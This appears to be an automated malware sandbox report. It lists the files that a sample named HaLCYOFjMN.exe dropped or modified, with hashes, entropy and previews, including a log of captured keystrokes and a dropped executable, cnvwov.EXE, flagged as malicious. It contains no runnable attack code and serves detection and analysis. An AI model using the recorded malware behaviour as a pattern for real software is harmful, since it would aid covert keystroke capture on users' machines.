                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\portBrowserweb.exe.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1915
                                                                                            Entropy (8bit):5.363869398054153
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4vb
                                                                                            MD5:63FDE44070DCD58C798C851711274955
                                                                                            SHA1:70F292AEC1D905E7B3875B457EFB6AB59666A9EE
                                                                                            SHA-256:11FE986688725A8BDA34D763C6BE6DBF4957CA1710603D111FBDFE7D7CB10DEE
                                                                                            SHA-512:E9DCC7BDB7895982206E6E3733D13B99E6B66F148AE44AF268AEF16BDBC752E05FDFD01F489EC7419403BB985E66A55A14A34523AE8DCE8B1077432524941DA5
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................

                                                                                            C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):76
                                                                                            Entropy (8bit):3.7199485344067496
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:rRSFYJKXzovNsr4rNrNryyAFYJKXzovNsra:EFYJKDoWrcBByyAFYJKDoWra
                                                                                            MD5:70332B4E3ED0908C15D7B8EB12ADE297
                                                                                            SHA1:903EE760E5D1608DEC1B603F2F0376F409767017
                                                                                            SHA-256:7712EAABCF53012ED8D8DBC2B4FF3BEB0470C4BB8A21482D1387A9534EFB9ECE
                                                                                            SHA-512:7A51460588DA9E20769DB5923D84ACE945BF848CB2C8662F2B1641C3ACD8070017142D3DB3CFDC32F4C2C81FB19659D91DD2C7483BB903B8395964205C759274
                                                                                            Malicious:false
                                                                                            Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r[WIN]r....### explorer ###..[WIN]r

                                                                                            C:\Users\user\AppData\Local\Temp\RES158C.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Tue Jan 7 19:26:53 2025, 1st section name ".debug$S"
                                                                                            Category:modified
                                                                                            Size (bytes):1928
                                                                                            Entropy (8bit):4.6285260162710795
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:9UaLz7iVZ5KTcslmuulB+hnqXSfbNtmh7:9jnulKTcs2TkZzNty7
                                                                                            MD5:C4EF65907F7785631BA90E9C49860466
                                                                                            SHA1:5F5824D6BFDE99B9CB135FE5B70CAF2D3C20A934
                                                                                            SHA-256:A18DD44441E8E8F9C74D397E05625273DE7CF4A0CAA2963DC7CC2D6074155E22
                                                                                            SHA-512:0CD7CE092ED0C9379550FE95EE25BE50BE626A29C4C378F33BEBCE1AE50CCD8BE02BFE6DE396B6985516D655C8BC48882FC933A0713380B7A0D4EA8AB6B4AF1E
                                                                                            Malicious:false
                                                                                            Preview:L.....}g.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP.....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES158C.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\agentwebreviewDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.

                                                                                            C:\Users\user\AppData\Local\Temp\RES1BB6.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c0, 10 symbols, created Tue Jan 7 19:26:55 2025, 1st section name ".debug$S"
                                                                                            Category:modified
                                                                                            Size (bytes):1912
                                                                                            Entropy (8bit):4.608770217971646
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Hrj69YsHoqSzd0l+ZHOwKTFtYNSlmxT0uZhN1+hBPNnqpdt4+lEbNFjMyi0+ucN:FsHo1dHZNKTcslmuul1+hzqXSfbNtmhr
                                                                                            MD5:898BE5A1A4BFB3A64E1F2ADFC9AC00F0
                                                                                            SHA1:1541DAD4B18BFA8612F049FE676D346A629D6CA1
                                                                                            SHA-256:F09E77B1F761FBA09D062859DEE9CB7AF52BD1DAA56CCFC90D156D367063C7AE
                                                                                            SHA-512:A11F4AA7FD12666613C637868E69CB96BDC39AC01B46B3ECC013471A30027D570A56410AB35B00DB14A8738993EBAAB5E17B4253D27BDA16D80C6FBC82B9D48D
                                                                                            Malicious:false
                                                                                            Preview:L.....}g.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........8...................@..@........L....c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP................8.B.:....b.6.g...........7.......C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\agentwebreviewDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...U.p.d.a.

                                                                                            C:\Users\user\AppData\Local\Temp\RES1F7E.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Tue Jan 7 19:26:56 2025, 1st section name ".debug$S"
                                                                                            Category:modified
                                                                                            Size (bytes):1956
                                                                                            Entropy (8bit):4.566460101504781
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:H1jO9/OqavnZHtYwKTFtYNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:PvvnZNKTcEluOulajfqXSfbNtmh1Z
                                                                                            MD5:CFB8481868339E9DADD3BB35CE0DCA44
                                                                                            SHA1:718A719632B324DB8D9770CB0029CF0233AD49DB
                                                                                            SHA-256:1B2D28F2A819F9BC724A22D9FDECD598AD4D0D56FB0233924A7CCC13588F4617
                                                                                            SHA-512:9F09DEED159A7CF15991250CABF23ED6A24EE2F78E1EA7D42C5FE115B27CFD8C04FD01C48708994FC16AA3421CF6E1A0A1F108AAD792238A622BA6656B3700FE
                                                                                            Malicious:false
                                                                                            Preview:L.....}g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP.....................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\agentwebreviewDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0rbwxujl.zps.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5haizsko.3we.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpc2cj3a.um0.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dywtyo2o.u4a.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3jmnw1p.ohc.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fu1jsves.zb3.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h00ifimu.21s.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilt2x2vp.nnl.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4magwjo.34r.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpeelbz.fbe.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2iff303.mc2.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_weghh0gm.4fh.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wznridqc.k5z.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yed143id.qfm.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvcizjgb.hei.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze0544z2.3xk.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\cnvwov.EXE

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):550912
                                                                                            Entropy (8bit):5.301296719752463
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:sYqdc0NkzDVvlhmTIlA41IBcN3p0NIb88WsNMPaKFP3b2V122J0sL:s9J85TX4cN3CNIb88WsNMP5F1k
                                                                                            MD5:F50B390915773B882776BB3EF569C708
                                                                                            SHA1:692556BD11E9CB617A9D09D14A9B493CF67E14D4
                                                                                            SHA-256:05C3D3A5E3A6E19F6B29DB7793CAED353F4574BF3CC493082458FD4C81CA33D0
                                                                                            SHA-512:D657F1FFC6349BA5BBB62008326B586933EF3E5688FF9A21334315633B4CC957D0A763B2E69988505B73BB87488581E9FF203B6229347754C55E2D679B7AC11F
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 68%
